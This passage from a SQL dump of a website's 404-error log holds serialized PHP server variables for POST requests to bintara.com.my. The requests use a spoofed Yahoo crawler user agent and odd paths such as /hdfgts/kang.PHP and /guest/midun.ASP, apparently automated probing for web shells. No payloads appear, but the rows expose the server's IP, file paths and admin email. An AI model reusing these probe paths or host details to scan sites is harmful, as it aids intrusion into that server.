Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"218.5.30.207\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"218.5.30.207\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/data/guowai.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/data/guowai.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tuSEiZGLZYlop40cFbgAAARc\";s:12:\"REDIRECT_URL\";s:16:\"/data/guowai.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64267\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/data/guowai.asp\";s:10:\"SCRIPT_URL\";s:16:\"/data/guowai.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tuSEiZGLZYlop40cFbgAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571696057.1917\";s:12:\"REQUEST_TIME\";s:10:\"1571696057\";}}','notice','2019-10-21 22:14:18','2019-10-21 22:14:17',35266512,37063896,'http://bintara.com.my//data/guowai.asp',1,0,'218.5.30.207'),(28673,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//hdfgts/kang.PHP\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.133.245.163\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.133.245.163\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/hdfgts/kang.PHP\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/hdfgts/kang.PHP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tvSEiZGLZYlop40cFcgAAAQA\";s:12:\"REDIRECT_URL\";s:16:\"/hdfgts/kang.PHP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64267\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/hdfgts/kang.PHP\";s:10:\"SCRIPT_URL\";s:16:\"/hdfgts/kang.PHP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tvSEiZGLZYlop40cFcgAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571696061.7887\";s:12:\"REQUEST_TIME\";s:10:\"1571696061\";}}','notice','2019-10-21 22:14:23','2019-10-21 22:14:22',35264720,37059576,'http://bintara.com.my//hdfgts/kang.PHP',1,0,'61.133.245.163'),(28674,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//hdfgts/kang.PHP\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.29.146.226\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.29.146.226\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/hdfgts/kang.PHP\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/hdfgts/kang.PHP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4txyEiZGLZYlop40cFeQAAAQg\";s:12:\"REDIRECT_URL\";s:16:\"/hdfgts/kang.PHP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64267\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/hdfgts/kang.PHP\";s:10:\"SCRIPT_URL\";s:16:\"/hdfgts/kang.PHP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4txyEiZGLZYlop40cFeQAAAQg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571696072.0632\";s:12:\"REQUEST_TIME\";s:10:\"1571696072\";}}','notice','2019-10-21 22:14:33','2019-10-21 22:14:32',35265632,37071296,'http://bintara.com.my//hdfgts/kang.PHP',1,0,'61.29.146.226'),(28675,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//guest/midun.ASP\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.202.103.93\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.202.103.93\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/guest/midun.ASP\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/guest/midun.ASP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tzyEiZGLZYlop40cFfgAAAQw\";s:12:\"REDIRECT_URL\";s:16:\"/guest/midun.ASP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64267\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/guest/midun.ASP\";s:10:\"SCRIPT_URL\";s:16:\"/guest/midun.ASP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tzyEiZGLZYlop40cFfgAAAQw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571696079.4356\";s:12:\"REQUEST_TIME\";s:10:\"1571696079\";}}','notice','2019-10-21 22:14:41','2019-10-21 22:14:39',35265368,37064808,'http://bintara.com.my//guest/midun.ASP',1,0,'202.202.103.93'),(28676,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//guest/midun.ASP\";s:14:\"CONTENT_LENGTH\";s:3:\"400\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"60.30.117.85\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"60.30.117.85\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/guest/midun.ASP\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/guest/midun.ASP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4t1SEiZGLZYlop40cFgQAAAQ8\";s:12:\"REDIRECT_URL\";s:16:\"/guest/midun.ASP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64267\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/guest/midun.ASP\";s:10:\"SCRIPT_URL\";s:16:\"/guest/midun.ASP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4t1SEiZGLZYlop40cFgQAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571696085.8948\";s:12:\"REQUEST_TIME\";s:10:\"1571696085\";}}','notice','2019-10-21 22:14:47','2019-10-21 22:14:46',35264720,37067792,'http://bintara.com.my//guest/midun.ASP',1,0,'60.30.117.85'),(28677,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//guest/midun.ASP\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"210.51.228.76\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"210.51.228.76\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/guest/midun.ASP\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/guest/midun.ASP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4t5RAAxqfYqgF3mYfVYwAAAE0\";s:12:\"REDIRECT_URL\";s:16:\"/guest/midun.ASP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"49821\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/guest/midun.ASP\";s:10:\"SCRIPT_URL\";s:16:\"/guest/midun.ASP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4t5RAAxqfYqgF3mYfVYwAAAE0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571696101.6253\";s:12:\"REQUEST_TIME\";s:10:\"1571696101\";}}','notice','2019-10-21 22:15:04','2019-10-21 22:15:02',35270432,37070680,'http://bintara.com.my//guest/midun.ASP',1,0,'210.51.228.76'),(28678,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//guest/midun.ASP\";s:14:\"CONTENT_LENGTH\";s:3:\"495\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"122.48.1.222\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"122.48.1.222\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/guest/midun.ASP\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/guest/midun.ASP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4t7BAAxqfYqgF3mYfVZAAAAFI\";s:12:\"REDIRECT_URL\";s:16:\"/guest/midun.ASP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"49821\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/guest/midun.ASP\";s:10:\"SCRIPT_URL\";s:16:\"/guest/midun.ASP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4t7BAAxqfYqgF3mYfVZAAAAFI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571696108.8491\";s:12:\"REQUEST_TIME\";s:10:\"1571696108\";}}','notice','2019-10-21 22:15:10','2019-10-21 22:15:09',35269840,37078016,'http://bintara.com.my//guest/midun.ASP',1,0,'122.48.1.222'),(28679,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//gongjiaonet.com\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"221.176.232.54\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"221.176.232.54\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/gongjiaonet.com\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/gongjiaonet.com\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4uAyEiZGLZYlop40cFlwAAAQc\";s:12:\"REDIRECT_URL\";s:16:\"/gongjiaonet.com\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50509\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/gongjiaonet.com\";s:10:\"SCRIPT_URL\";s:16:\"/gongjiaonet.com\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4uAyEiZGLZYlop40cFlwAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571696132.0886\";s:12:\"REQUEST_TIME\";s:10:\"1571696132\";}}','notice','2019-10-21 22:15:33','2019-10-21 22:15:32',35263816,37070208,'http://bintara.com.my//gongjiaonet.com',1,0,'221.176.232.54'),(28680,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//gongjiaonet.com\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.207.140.14\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.207.140.14\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/gongjiaonet.com\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/gongjiaonet.com\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4uFhAAxqfYqgF3mYfVagAAAEQ\";s:12:\"REDIRECT_URL\";s:16:\"/gongjiaonet.com\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51462\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/gongjiaonet.com\";s:10:\"SCRIPT_URL\";s:16:\"/gongjiaonet.com\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4uFhAAxqfYqgF3mYfVagAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571696151.079\";s:12:\"REQUEST_TIME\";s:10:\"1571696151\";}}','notice','2019-10-21 22:15:52','2019-10-21 22:15:51',35269776,37083216,'http://bintara.com.my//gongjiaonet.com',1,0,'58.207.140.14'),(28681,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/2018/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.m